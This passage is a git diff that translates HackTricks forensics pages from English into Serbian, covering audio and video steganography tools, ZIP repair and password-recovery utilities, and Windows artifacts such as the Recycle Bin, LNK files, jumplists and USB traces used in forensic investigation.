+* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
+* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
-**Audio and video file manipulation** is a staple in **CTF forensics challenges**, leveraging **steganography** and metadata analysis to hide or reveal secret messages. Tools such as **[mediainfo](https://mediaarea.net/en/MediaInfo)** and **`exiftool`** are essential for inspecting file metadata and identifying content types.
+**Manipulacija audio i video fajlovima** je osnova u izazovima **CTF forenzike**, koristeći **steganografiju** i analizu metapodataka za skrivanje ili otkrivanje tajnih poruka. Alati poput **[mediainfo](https://mediaarea.net/en/MediaInfo)** i **`exiftool`** su neophodni za pregledanje metapodataka fajlova i identifikaciju vrsta sadržaja.
-For audio challenges, **[Audacity](http://www.audacityteam.org/)** stands out as a premier tool for viewing waveforms and analyzing spectrograms, essential for uncovering text encoded in audio. **[Sonic Visualiser](http://www.sonicvisualiser.org/)** is highly recommended for detailed spectrogram analysis. **Audacity** allows for audio manipulation like slowing down or reversing tracks to detect hidden messages. **[Sox](http://sox.sourceforge.net/)**, a command-line utility, excels in converting and editing audio files.
+Za audio izazove, **[Audacity](http://www.audacityteam.org/)** se ističe kao vodeći alat za pregledanje talasnih oblika i analizu spektrograma, što je ključno za otkrivanje teksta kodiranog u audio formatu. **[Sonic Visualiser](http://www.sonicvisualiser.org/)** se visoko preporučuje za detaljnu analizu spektrograma. **Audacity** omogućava manipulaciju audio snimcima kao što su usporavanje ili obrtanje traka kako bi se otkrile skrivene poruke. **[Sox](http://sox.sourceforge.net/)**, komandna linija, se odlično snalazi u konverziji i uređivanju audio fajlova.
-**Least Significant Bits (LSB)** manipulation is a common technique in audio and video steganography, exploiting the fixed-size chunks of media files to embed data discreetly. **[Multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng)** is useful for decoding messages hidden as **DTMF tones** or **Morse code**.
+**Manipulacija najmanje značajnim bitovima (LSB)** je česta tehnika u audio i video steganografiji, iskorišćavajući fiksne delove medijskih fajlova za skriveno ugrađivanje podataka. **[Multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng)** je koristan za dekodiranje poruka skrivenih kao **DTMF tonovi** ili **Morseov kod**.
-Video challenges often involve container formats that bundle audio and video streams. **[FFmpeg](http://ffmpeg.org/)** is the go-to for analyzing and manipulating these formats, capable of de-multiplexing and playing back content. For developers, **[ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html)** integrates FFmpeg's capabilities into Python for advanced scriptable interactions.
+Video izazovi često uključuju kontejnerske formate koji sadrže audio i video tokove. **[FFmpeg](http://ffmpeg.org/)** je alat za analizu i manipulaciju ovim formatima, sposoban za de-multiplexiranje i reprodukciju sadržaja. Za programere, **[ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html)** integriše mogućnosti FFmpeg-a u Python za napredne skriptabilne interakcije.
-This array of tools underscores the versatility required in CTF challenges, where participants must employ a broad spectrum of analysis and manipulation techniques to uncover hidden data within audio and video files.
+Ova paleta alata naglašava potrebnu fleksibilnost u CTF izazovima, gde učesnici moraju primeniti širok spektar tehnika analize i manipulacije kako bi otkrili skrivene podatke unutar audio i video fajlova.
-## References
+## Reference
* [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
-Other ways to support HackTricks:
+Drugi načini podrške HackTricks-u:
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE PRETPLATE**](https://github.com/sponsors/carlospolop)!
+* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
+* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
-
-
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md
index 16b905ce3..69bdb763a 100644
--- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md
+++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md
@@ -1,44 +1,44 @@
-# ZIPs tricks
+# Trikovi sa ZIP fajlovima
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
-Other ways to support HackTricks:
+Drugi načini podrške HackTricks-u:
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu**, proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)!
+* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
+* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
-**Command-line tools** for managing **zip files** are essential for diagnosing, repairing, and cracking zip files. Here are some key utilities:
+**Command-line alati** za upravljanje **zip fajlovima** su neophodni za dijagnostikovanje, popravku i probijanje zip fajlova. Evo nekih ključnih alata:
-- **`unzip`**: Reveals why a zip file may not decompress.
-- **`zipdetails -v`**: Offers detailed analysis of zip file format fields.
-- **`zipinfo`**: Lists contents of a zip file without extracting them.
-- **`zip -F input.zip --out output.zip`** and **`zip -FF input.zip --out output.zip`**: Try to repair corrupted zip files.
-- **[fcrackzip](https://github.com/hyc/fcrackzip)**: A tool for brute-force cracking of zip passwords, effective for passwords up to around 7 characters.
+- **`unzip`**: Otkriva zašto se zip fajl možda ne može dekompresovati.
+- **`zipdetails -v`**: Pruža detaljnu analizu polja formata zip fajla.
+- **`zipinfo`**: Lista sadržaj zip fajla bez ekstrakcije.
+- **`zip -F input.zip --out output.zip`** i **`zip -FF input.zip --out output.zip`**: Pokušajte da popravite oštećene zip fajlove.
+- **[fcrackzip](https://github.com/hyc/fcrackzip)**: Alat za brute-force probijanje lozinki zip fajlova, efikasan za lozinke do oko 7 karaktera.
-The [Zip file format specification](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT) provides comprehensive details on the structure and standards of zip files.
+Specifikacija [Zip formata fajla](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT) pruža sveobuhvatne detalje o strukturi i standardima zip fajlova.
-It's crucial to note that password-protected zip files **do not encrypt filenames or file sizes** within, a security flaw not shared with RAR or 7z files which encrypt this information. Furthermore, zip files encrypted with the older ZipCrypto method are vulnerable to a **plaintext attack** if an unencrypted copy of a compressed file is available. This attack leverages the known content to crack the zip's password, a vulnerability detailed in [HackThis's article](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files) and further explained in [this academic paper](https://www.cs.auckland.ac.nz/\~mike/zipattacks.pdf). However, zip files secured with **AES-256** encryption are immune to this plaintext attack, showcasing the importance of choosing secure encryption methods for sensitive data.
+Važno je napomenuti da zip fajlovi zaštićeni lozinkom **ne šifruju imena fajlova ili veličine fajlova** unutar sebe, što je sigurnosna slabost koju ne dele RAR ili 7z fajlovi koji šifruju ove informacije. Osim toga, zip fajlovi koji su šifrovani starijom metodom ZipCrypto su ranjivi na **napad sa poznatim tekstom** ako je dostupna nešifrovana kopija komprimiranog fajla. Ovaj napad koristi poznati sadržaj za probijanje lozinke zip fajla, ranjivost koja je detaljno objašnjena u [HackThis-ovom članku](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files) i dalje objašnjena u [ovom naučnom radu](https://www.cs.auckland.ac.nz/\~mike/zipattacks.pdf). Međutim, zip fajlovi koji su obezbeđeni **AES-256** šifrovanjem su imuni na ovaj napad sa poznatim tekstom, što pokazuje važnost izbora sigurnih metoda šifrovanja za osetljive podatke.
-## References
+## Reference
* [https://michael-myers.github.io/blog/categories/ctf/](https://michael-myers.github.io/blog/categories/ctf/)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
-Other ways to support HackTricks:
+Drugi načini podrške HackTricks-u:
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu**, proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)!
+* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
+* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
diff --git a/forensics/basic-forensic-methodology/windows-forensics/README.md b/forensics/basic-forensic-methodology/windows-forensics/README.md
index 2b8d2400b..815ae3059 100644
--- a/forensics/basic-forensic-methodology/windows-forensics/README.md
+++ b/forensics/basic-forensic-methodology/windows-forensics/README.md
@@ -1,526 +1,492 @@
-# Windows Artifacts
+# Windows Artifakti
-## Windows Artifacts
+## Windows Artifakti
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
-Other ways to support HackTricks:
+Drugi načini podrške HackTricks-u:
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
+* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
-## Generic Windows Artifacts
+## Generički Windows Artifakti
-### Windows 10 Notifications
+### Windows 10 Obaveštenja
-In the path `\Users\\AppData\Local\Microsoft\Windows\Notifications` you can find the database `appdb.dat` (before Windows anniversary) or `wpndatabase.db` (after Windows Anniversary).
+Na putanji `\Users\\AppData\Local\Microsoft\Windows\Notifications` možete pronaći bazu podataka `appdb.dat` (pre Windows Anniversary) ili `wpndatabase.db` (posle Windows Anniversary).
-Inside this SQLite database, you can find the `Notification` table with all the notifications (in XML format) that may contain interesting data.
+Unutar ove SQLite baze podataka, možete pronaći tabelu `Notification` sa svim obaveštenjima (u XML formatu) koja mogu sadržati interesantne podatke.
-### Timeline
+### Vremenska linija
-Timeline is a Windows characteristic that provides **chronological history** of web pages visited, edited documents, and executed applications.
+Vremenska linija je karakteristika Windows-a koja pruža **hronološku istoriju** posećenih web stranica, izmenjenih dokumenata i izvršenih aplikacija.
-The database resides in the path `\Users\\AppData\Local\ConnectedDevicesPlatform\\ActivitiesCache.db`. This database can be opened with an SQLite tool or with the tool [**WxTCmd**](https://github.com/EricZimmerman/WxTCmd) **which generates 2 files that can be opened with the tool** [**TimeLine Explorer**](https://ericzimmerman.github.io/#!index.md).
+Baza podataka se nalazi na putanji `\Users\\AppData\Local\ConnectedDevicesPlatform\\ActivitiesCache.db`. Ovu bazu podataka možete otvoriti sa alatom SQLite ili sa alatom [**WxTCmd**](https://github.com/EricZimmerman/WxTCmd) **koji generiše 2 fajla koji se mogu otvoriti sa alatom** [**TimeLine Explorer**](https://ericzimmerman.github.io/#!index.md).
### ADS (Alternate Data Streams)
-Files downloaded may contain the **ADS Zone.Identifier** indicating **how** it was **downloaded** from the intranet, internet, etc. Some software (like browsers) usually put even **more** **information** like the **URL** from where the file was downloaded.
+Preuzeti fajlovi mogu sadržati **ADS Zone.Identifier** koji ukazuje **kako** je fajl **preuzet** sa intraneta, interneta, itd. Neki softveri (kao što su pretraživači) obično dodaju **još** **informacija** kao što je **URL** sa kog je fajl preuzet.
-## **File Backups**
+## **Rezervne kopije fajlova**
-### Recycle Bin
+### Korpa za smeće
-In Vista/Win7/Win8/Win10 the **Recycle Bin** can be found in the folder **`$Recycle.bin`** in the root of the drive (`C:\$Recycle.bin`).\
-When a file is deleted in this folder 2 specific files are created:
+U Vista/Win7/Win8/Win10 operativnim sistemima, **Korpa za smeće** se može pronaći u folderu **`$Recycle.bin`** u korenu diska (`C:\$Recycle.bin`).\
+Kada se fajl obriše u ovom folderu, kreiraju se 2 specifična fajla:
-* `$I{id}`: File information (date of when it was deleted}
-* `$R{id}`: Content of the file
+* `$I{id}`: Informacije o fajlu (datum kada je obrisan}
+* `$R{id}`: Sadržaj fajla
![](<../../../.gitbook/assets/image (486).png>)
-Having these files you can use the tool [**Rifiuti**](https://github.com/abelcheung/rifiuti2) to get the original address of the deleted files and the date it was deleted (use `rifiuti-vista.exe` for Vista – Win10).
-
+Koristeći ove fajlove, možete koristiti alat [**Rifiuti**](https://github.com/abelcheung/rifiuti2) da biste dobili originalnu adresu obrisanih fajlova i datum kada su obrisani (koristite `rifiuti-vista.exe` za Vista – Win10).
```
.\rifiuti-vista.exe C:\Users\student\Desktop\Recycle
```
-
![](<../../../.gitbook/assets/image (495) (1) (1) (1).png>)
-### Volume Shadow Copies
+### Kopije senki volumena
-Shadow Copy is a technology included in Microsoft Windows that can create **backup copies** or snapshots of computer files or volumes, even when they are in use.
+Shadow Copy je tehnologija koja je uključena u Microsoft Windows i može kreirati **rezervne kopije** ili snimke fajlova ili volumena računara, čak i kada su u upotrebi.
-These backups are usually located in the `\System Volume Information` from the root of the file system and the name is composed of **UIDs** shown in the following image:
+Ove rezervne kopije se obično nalaze u `\System Volume Information` od korena fajl sistema, a ime je sastavljeno od **UID-ova** prikazanih na sledećoj slici:
![](<../../../.gitbook/assets/image (520).png>)
-Mounting the forensics image with the **ArsenalImageMounter**, the tool [**ShadowCopyView**](https://www.nirsoft.net/utils/shadow\_copy\_view.html) can be used to inspect a shadow copy and even **extract the files** from the shadow copy backups.
+Montiranjem forenzičke slike sa **ArsenalImageMounter**-om, alatka [**ShadowCopyView**](https://www.nirsoft.net/utils/shadow\_copy\_view.html) se može koristiti za pregledanje kopije senke i čak **izvlačenje fajlova** iz rezervnih kopija senke.
![](<../../../.gitbook/assets/image (521).png>)
-The registry entry `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\BackupRestore` contains the files and keys **to not backup**:
+Unos registra `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\BackupRestore` sadrži fajlove i ključeve **koji se neće rezervisati**:
![](<../../../.gitbook/assets/image (522).png>)
-The registry `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS` also contains configuration information about the `Volume Shadow Copies`.
+Registar `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS` takođe sadrži informacije o konfiguraciji `Volume Shadow Copies`.
-### Office AutoSaved Files
+### Office automatski sačuvani fajlovi
-You can find the office autosaved files in: `C:\Usuarios\\AppData\Roaming\Microsoft{Excel|Word|Powerpoint}\`
+Office automatski sačuvava fajlove na sledećoj lokaciji: `C:\Usuarios\\AppData\Roaming\Microsoft{Excel|Word|Powerpoint}\`
-## Shell Items
+## Shell stavke
-A shell item is an item that contains information about how to access another file.
+Shell stavka je stavka koja sadrži informacije o tome kako pristupiti drugom fajlu.
-### Recent Documents (LNK)
+### Nedavni dokumenti (LNK)
-Windows **automatically** **creates** these **shortcuts** when the user **open, uses or creates a file** in:
+Windows **automatski** **kreira** ove **prečice** kada korisnik **otvori, koristi ili kreira fajl** u:
* Win7-Win10: `C:\Users\\AppData\Roaming\Microsoft\Windows\Recent\`
* Office: `C:\Users\\AppData\Roaming\Microsoft\Office\Recent\`
-When a folder is created, a link to the folder, to the parent folder, and the grandparent folder is also created.
+Kada se kreira folder, takođe se kreira veza do foldera, roditeljskog foldera i pradedovskog foldera.
-These automatically created link files **contain information about the origin** like if it's a **file** **or** a **folder**, **MAC** **times** of that file, **volume information** of where is the file stored and **folder of the target file**. This information can be useful to recover those files in case they were removed.
+Ove automatski kreirane link fajlove **sadrže informacije o poreklu** kao da li je to **fajl** **ili** folder, **MAC** **vremena** tog fajla, **informacije o volumenu** gde je fajl smešten i **folder ciljnog fajla**. Ove informacije mogu biti korisne za oporavak tih fajlova u slučaju da su uklonjeni.
-Also, the **date created of the link** file is the first **time** the original file was **first** **used** and the **date** **modified** of the link file is the **last** **time** the origin file was used.
+Takođe, **datum kreiranja linka** fajla je prvo **vreme** kada je originalni fajl **prvi put** **korišćen**, a **datum** **izmene** link fajla je **poslednje** **vreme** kada je origin fajl korišćen.
-To inspect these files you can use [**LinkParser**](http://4discovery.com/our-tools/).
+Za pregledanje ovih fajlova možete koristiti [**LinkParser**](http://4discovery.com/our-tools/).
-In this tools you will find **2 sets** of timestamps:
+U ovoj alatki ćete naći **2 seta** vremenskih oznaka:
-* **First Set:**
- 1. FileModifiedDate
- 2. FileAccessDate
- 3. FileCreationDate
-* **Second Set:**
- 1. LinkModifiedDate
- 2. LinkAccessDate
- 3. LinkCreationDate.
+* **Prvi set:**
+1. FileModifiedDate
+2. FileAccessDate
+3. FileCreationDate
+* **Drugi set:**
+1. LinkModifiedDate
+2. LinkAccessDate
+3. LinkCreationDate.
-The first set of timestamp references the **timestamps of the file itself**. The second set references the **timestamps of the linked file**.
-
-You can get the same information running the Windows CLI tool: [**LECmd.exe**](https://github.com/EricZimmerman/LECmd)
+Prvi set vremenskih oznaka se odnosi na **vremenske oznake samog fajla**. Drugi set se odnosi na **vremenske oznake povezanog fajla**.
+Možete dobiti iste informacije pokretanjem Windows CLI alatke: [**LECmd.exe**](https://github.com/EricZimmerman/LECmd)
```
LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs
```
+U ovom slučaju, informacije će biti sačuvane unutar CSV datoteke.
-In this case, the information is going to be saved inside a CSV file.
+### Jumpliste
-### Jumplists
+Ovo su nedavne datoteke koje su označene po aplikacijama. To je lista **nedavnih datoteka koje je koristila aplikacija** kojoj možete pristupiti u svakoj aplikaciji. Mogu se **automatski kreirati ili biti prilagođene**.
-These are the recent files that are indicated per application. It's the list of **recent files used by an application** that you can access on each application. They can be created **automatically or be custom**.
+Automatski kreirane **jumpliste** se čuvaju u `C:\Users\{korisničko_ime}\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\`. Jumpliste su nazvane prema formatu `{id}.autmaticDestinations-ms` gde je početni ID ID aplikacije.
-The **jumplists** created automatically are stored in `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\`. The jumplists are named following the format `{id}.autmaticDestinations-ms` where the initial ID is the ID of the application.
+Prilagođene jumpliste se čuvaju u `C:\Users\{korisničko_ime}\AppData\Roaming\Microsoft\Windows\Recent\CustomDestination\` i obično ih aplikacija kreira jer se nešto **važno** desilo sa datotekom (možda je označena kao omiljena).
-The custom jumplists are stored in `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\CustomDestination\` and they are created by the application usually because something **important** has happened with the file (maybe marked as favorite)
+Vreme kreiranja bilo koje jumpliste pokazuje **prvi put kada je datoteka pristupljena** i vreme izmene poslednji put.
-The **created time** of any jumplist indicates the **the first time the file was accessed** and the **modified time the last time**.
-
-You can inspect the jumplists using [**JumplistExplorer**](https://ericzimmerman.github.io/#!index.md).
+Jumpliste možete pregledati koristeći [**JumplistExplorer**](https://ericzimmerman.github.io/#!index.md).
![](<../../../.gitbook/assets/image (474).png>)
-(_Note that the timestamps provided by JumplistExplorer are related to the jumplist file itself_)
+(_Napomena: Vremenske oznake koje pruža JumplistExplorer odnose se na samu jumplist datoteku_)
### Shellbags
-[**Follow this link to learn what are the shellbags.**](interesting-windows-registry-keys.md#shellbags)
+[**Pratite ovaj link da biste saznali šta su shellbags.**](interesting-windows-registry-keys.md#shellbags)
-## Use of Windows USBs
+## Korišćenje Windows USB uređaja
-It's possible to identify that a USB device was used thanks to the creation of:
+Moguće je identifikovati da je USB uređaj korišćen zahvaljujući kreiranju:
* Windows Recent Folder
* Microsoft Office Recent Folder
-* Jumplists
+* Jumpliste
-Note that some LNK file instead of pointing to the original path, points to the WPDNSE folder:
+Imajte na umu da neki LNK fajl umesto da pokazuje na originalnu putanju, pokazuje na WPDNSE folder:
![](<../../../.gitbook/assets/image (476).png>)
-The files in the folder WPDNSE are a copy of the original ones, then won't survive a restart of the PC and the GUID is taken from a shellbag.
+Datoteke u folderu WPDNSE su kopija originalnih datoteka, pa neće preživeti restart računara, a GUID se uzima iz shellbaga.
-### Registry Information
+### Informacije iz registra
-[Check this page to learn](interesting-windows-registry-keys.md#usb-information) which registry keys contain interesting information about USB connected devices.
+[Proverite ovu stranicu da biste saznali](interesting-windows-registry-keys.md#usb-information) koje registarske ključeve sadrže zanimljive informacije o povezanim USB uređajima.
### setupapi
-Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced (search for `Section start`).
+Proverite datoteku `C:\Windows\inf\setupapi.dev.log` da biste dobili vremenske oznake kada je USB veza uspostavljena (pretražite `Section start`).
-![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png>)
+![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png>)
### USB Detective
-[**USBDetective**](https://usbdetective.com) can be used to obtain information about the USB devices that have been connected to an image.
+[**USBDetective**](https://usbdetective.com) se može koristiti za dobijanje informacija o USB uređajima koji su bili povezani sa slikom.
![](<../../../.gitbook/assets/image (483).png>)
-### Plug and Play Cleanup
+### Čišćenje Plug and Play
-The scheduled task known as 'Plug and Play Cleanup' is primarily designed for the removal of outdated driver versions. Contrary to its specified purpose of retaining the latest driver package version, online sources suggest it also targets drivers that have been inactive for 30 days. Consequently, drivers for removable devices not connected in the past 30 days may be subject to deletion.
+Zakazani zadatak poznat kao 'Plug and Play Cleanup' je pretežno dizajniran za uklanjanje zastarelih verzija drajvera. Suprotno od navedene svrhe zadržavanja najnovije verzije paketa drajvera, online izvori sugerišu da takođe cilja drajvere koji su bili neaktivni tokom 30 dana. Kao rezultat toga, drajveri za prenosive uređaje koji nisu bili povezani u poslednjih 30 dana mogu biti podložni brisanju.
-The task is located at the following path:
+Zadatak se nalazi na sledećoj putanji:
`C:\Windows\System32\Tasks\Microsoft\Windows\Plug and Play\Plug and Play Cleanup`.
-A screenshot depicting the task's content is provided:
+Prikazan je snimak ekrana sadržaja zadatka:
![](https://2.bp.blogspot.com/-wqYubtuR_W8/W19bV5S9XyI/AAAAAAAANhU/OHsBDEvjqmg9ayzdNwJ4y2DKZnhCdwSMgCLcBGAs/s1600/xml.png)
-**Key Components and Settings of the Task:**
-- **pnpclean.dll**: This DLL is responsible for the actual cleanup process.
-- **UseUnifiedSchedulingEngine**: Set to `TRUE`, indicating the use of the generic task scheduling engine.
+**Ključni komponenti i podešavanja zadatka:**
+- **pnpclean.dll**: Ova DLL je odgovorna za sam proces čišćenja.
+- **UseUnifiedSchedulingEngine**: Postavljeno na `TRUE`, što ukazuje na korišćenje generičkog mehanizma zakazivanja zadataka.
- **MaintenanceSettings**:
- - **Period ('P1M')**: Directs the Task Scheduler to initiate the cleanup task monthly during regular Automatic maintenance.
- - **Deadline ('P2M')**: Instructs the Task Scheduler, if the task fails for two consecutive months, to execute the task during emergency Automatic maintenance.
+- **Period ('P1M')**: Usmerava Task Scheduler da pokrene zadatak čišćenja mesečno tokom redovnog automatskog održavanja.
+- **Deadline ('P2M')**: Nalaže Task Scheduleru, ako zadatak ne uspe dva uzastopna meseca, da izvrši zadatak tokom hitnog automatskog održavanja.
-This configuration ensures regular maintenance and cleanup of drivers, with provisions for reattempting the task in case of consecutive failures.
+Ova konfiguracija obezbeđuje redovno održavanje i čišćenje drajvera, uz mogućnost ponovnog pokušaja izvršavanja zadatka u slučaju uzastopnih neuspeha.
-**For more information check:** [**https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html**](https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html)
